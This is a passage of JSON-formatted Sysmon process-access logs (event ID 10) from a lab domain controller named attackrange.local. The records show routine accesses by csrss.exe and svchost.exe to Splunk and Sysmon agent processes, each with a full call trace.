Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2360,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.864\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1077-5F25-0000-001065260400}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.864","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1077-5F25-0000-001065260400}","TargetProcessId":"4004","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2361,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.864\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.864","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2362,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.864\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.864","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2363,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.864\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.864","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2364,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.864\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.864","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2365,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.864\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.864","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2366,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.864\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.864","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2367,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:27.864\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:27.864","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
